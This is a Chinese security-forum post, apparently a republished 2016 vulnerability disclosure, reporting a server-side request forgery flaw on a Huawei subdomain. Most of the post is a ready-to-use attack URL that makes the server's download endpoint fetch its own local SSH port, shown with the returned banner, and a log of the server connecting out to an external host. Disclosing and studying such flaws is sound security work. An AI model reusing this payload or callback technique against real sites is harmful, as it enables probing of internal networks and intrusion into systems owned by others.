HanDs
管理员

[7月漏洞公开] 华为某分站存在SSRF漏洞 





学习中请遵循国家相关法律法规,黑客不作恶。没有网络安全就没有国家安全

本站需要登陆后才能查看

华为某分站存在SSRF漏洞
看看有多少公司认为SSRF不算漏洞

详细说明:

#1 网站

http://hnc.huawei.com/

#2 SSRF地址

http://hnc.huawei.com/web/downloadAction!download.do?relativePath=http://127.0.0.1:22&fileName=123.txt

#3 参数

relativePath

漏洞证明:

http://hnc.huawei.com/web/downloadAction!download.do?relativePath=http://127.0.0.1:22&fileName=123.txt

code 区域
SSH-2.0-WeOnlyDo 2.4.3



# 请求远程服务器

code 区域
Connection from 117.78.9.4 port 8080 [tcp/webcache] accepted
GET / HTTP/1.1
Cache-Control: no-cache
Pragma: no-cache
User-Agent: Java/1.6.0_43
Host: 119.29.29.29:8080
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive

修复方案:

把用于取外网资源的API部署在不属于自己的机房


学习中请遵守法律法规,本网站内容均来自于互联网,本网站不负担法律责任
华为 分站 存在 S SR F 漏洞
#1楼
发帖时间:2016-7-15   |   查看数:0   |   回复数:0
游客组
快速回复